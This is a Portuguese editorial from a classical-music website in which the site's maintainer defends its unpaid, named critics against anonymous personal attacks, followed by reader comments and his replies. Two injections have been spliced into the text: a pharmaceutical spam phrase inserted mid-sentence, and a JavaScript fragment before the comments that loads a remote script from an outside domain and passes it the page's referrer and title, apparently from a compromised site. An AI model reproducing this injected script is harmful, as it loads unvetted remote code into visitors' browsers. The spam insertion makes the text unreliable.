ArtigoLateral

Os críticos dos críticos…

Vocês podem verificar que cada currículo de nossos comentaristas tem um quê de modéstia e de verdade.

O www.movimento.com abre um espaço democrático para comentários diretos do público sobre cada crítica, matéria, artigo, notícia, etc…, publicada por nossos colaboradores, com isso, valorizando e incentivando o debate sadio. Nem será preciso confirmar que tais comentários devem se ater aos temas de cada texto, podem demonstrar discordância é claro, mas não conter ofensas pessoais ou tentar desdenhar dos colaboradores.

Queria lembrar que o nosso site coloca no ar muitas vezes até 3 críticas de um mesmo espetáculo, feitas por pessoas absolutamente diferentes e com toda a liberdade. Não encontramos isso em nenhum outro veículo voltado para a música clássica.

Nossos colaboradores escrevem por livre e espontânea vontade e amor à arte, cientes de que não receberão qualquer pagamento pela colaboração, e que, exatamente por isso, cada um tem sua atividade profissional remunerada, ligada ou não à área musical. Obviamente, o fato de escrever graciosamente não diminui em nada a pessoa que o faz e muito menos aquilo que ela escreve. Na minha opinião, muito pelo contrário: isso a valoriza sobremaneira.

No mundo inteiro e em todas as épocas, muitos jornalistas/articulistas/críticos, de diversos órgãos de imprensa, nacionais ou estrangeiros, não tiveram formação específica na área musical – o que não os impede de buscar, pelos meios disponíveis, o aprofundamento de seus conhecimentos, de forma a melhor desempenharem suas funções.

Sabemos que os espaços para as pessoas se pronunciarem sobre qualquer assunto, apesar da internet, ainda é escasso. Abrimos um campo de diálogo e discussão sadia. Por isso, não entendemos o prazer de se questionar  justamente o veículo de mídia especializado em música clássica e lírica que mais abre espaço para o debate. Atenção… questionar é sempre importante, mas há meios e meios.  Não queremos ser  vítimas de ataques pessoais.

Perguntariam vocês qual o propósito de toda esta introdução. Bom, temos um recente embate proveniente  do que os usuários postam no site,  posicionando-se a respeito dos comentários publicados por nossos co

laboradores. Há alguns indivíduos que se comprazem em perder tempo escrevendo no site coisas que tentam desmerecer nossos colaboradores. Melhor tivessem algo produtivo para fazerem.

Ora, o site tem uma política que exige que os colaboradores sejam perfeitamente identificados, pois colocamos fotos e breve currículo de cada um, enviados por eles mesmos, onde poderiam escrever o que quisessem. Entretanto, vocês vão poder verificar que cada currículo tem um quê de modéstia e de verdade.

Recebo muitas solicitações de pessoas que querem escrever, mas não querem aparecer… e nem sempre seriam comentários desairosos, muito pelo contrário. Sou sempre muito claro nestes casos: “você pode escrever, mas preciso publicar sua foto e seu breve currículo.”

Possivelmente, estaremos perdendo ótimos comentários, pois muitas destas how much cialis is too much pessoas eu conheço e sei de sua capacidade para escreverem sobre aquilo que se propõe. No entanto, deve prevalecer a exigência da clareza e do “se expor”.

Obviamente, gostaria eu que os usuários fizessem a si mesmos esta exigência e se mostrassem claramente, sem se esconderem atrás de pseudônimos e apelidos, com emails que não existem, como tem acontecido, especialmente em textos que tentam desmerecer as pessoas que escrevem para o site. Muitas vezes, testo os email que lá são colocados e não dá em nada.

Sou bem claro neste assunto, assim como para nossos colaboradores: “se você não pode aparecer, simplesmente cale-se”. Não é justo que os comentaristas, que dão a cara a tapa, sejam criticados por pessoas que se escondem.

Obviamente, vou tentar encontrar uma maneira de identificar estes comentários e, caso os detecte, simplesmente, não os colocarei no ar. Acredito até que podemos perder bons assuntos e boas opiniões, mas prefiro isso a ter comentários ofensivos (que eu não publico, mesmo que a pessoa se identifique perfeitamente) e escondidos.

Não posso entender o motivo que leva estas pessoas a simplesmente tentarem desancar os comentaristas com ofensas pessoais. Será que não sentem em si mesmos capacidade para criticarem os textos publicados? Será que muitos destes que escrevem estiveram mesmo assistindo ao espetáculo de que se fala? Não sei não… Há que desconfiar de tanto ódio.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

7 Comments

  1. Faço minhas as palavras do colega e administrador desse maravilhoso portal Antônio Rodrigues. Após o texto “Tenor Brasileiro é vaiado na Argentina” recebi inúmeras ofensas pessoais. Pena que em algumas pessoas a ignorância prevaleça e a opinião e o debate sejam deixados de lado.

  2. É muita covardia e desonestidade permitir que colunistas escrevam sobre eventos que, confessadamente, não presenciaram, como no caso da crítica raivosa ao Arancam. Disso sim dá para desconfiar. Como dizia Tom Jobim, no Brasil, sucesso é encarado como ofensa pessoal.

  3. Interessante esse artigo do responsável por este site, mas ao meu entender a culpa é do próprio site por recrutar pessoas incapacitadas tecnicamente para tais “criticas, artigos entre outros”. Sim que os mesmos tenham boa vontade e trabalhem a grátis, mas para se ter personalidade e credibilidade é necessário ter conhecimento, experiência e inteligência.
    Não posso recrutar em um hospital pessoas que não são capacitadas para executar a tarefa de enfermaria, mesma que a grátis, por amor.

    Obs. Por favor, mostre-me a credibilidade e democracia neste site publicando o meu comentário.

  4. Para o Sr. Antônio
    Caro amigo, perceba que o comentarista não está fazendo crítica alguma à récita do Thiago Arancan, mas simplesmente dando uma notícia. Os demais comentários dele não dizem respeito à tal récita, pois ele não esteve presente a ela.

  5. Para o Sr. Paulo Silveira
    A democracia está no fato de que o site aceita as críticas ao que eles escrevem, mas não ofensas pessoais. Aliás, eles só tomam conhecimento dos comentários dos usuários depois que eu os libero. Eu não os consulto sobre isso.
    Se algum comentário de sua autoria não foi publicado só há 2 possibilidades: ou ele se perdeu, o que eu acho muito difícil, ou ele continha desmerecimentos às pessoas dos nossos comentaristas e em baixo nível e não suas opiniões sobre os conteúdos expostos por eles.
    Espero que, no seu caso, tenha sido a primeira hipótese.
    Para encerrar, repito suas próprias palavras: “mas se discordarem do autor e seus conteúdos e os criticarem por isso, não vejo nenhum problema”.

  6. Para o Sr. Roberto Abrão
    Caro senhor, o site não recruta pessoas incapazes. Isso é uma opinião sua muito errônea. Eles são muito capazes e demonstram isso escrevendo sobre diversos eventos musicais no Brasil inteiro.
    Para você chegar a poder dizer que eles são “incapacitados tecnicamente”, posso supor que você seja capacitado tecnicamente, caso contrário sua assertiva não teria lógica alguma.
    Posso, portanto, continuar supondo que seus comentários, caso tenham existido, devem se ter referido apenas ao conteúdo exposto pelo nosso site, sem tentar esculhambar as pessoas que escrevem, pelo que se supõe que sejam, e não pelo que escrevam.
    Vou aproveitar suas próprias palavras: “para se ter personalidade e credibilidade é necessário ter conhecimento, experiência e inteligência”.
    Espero que seus comentários, mais uma vez, se existiram, tenham sido eivados destes conceitos que você expôs tão bem: “conhecimento, experiência e inteligência”.

Comments are closed.

Antônio Rodrigues
Apaixonado por música coral, é um dos fundadores e mantenedor do movimento.com.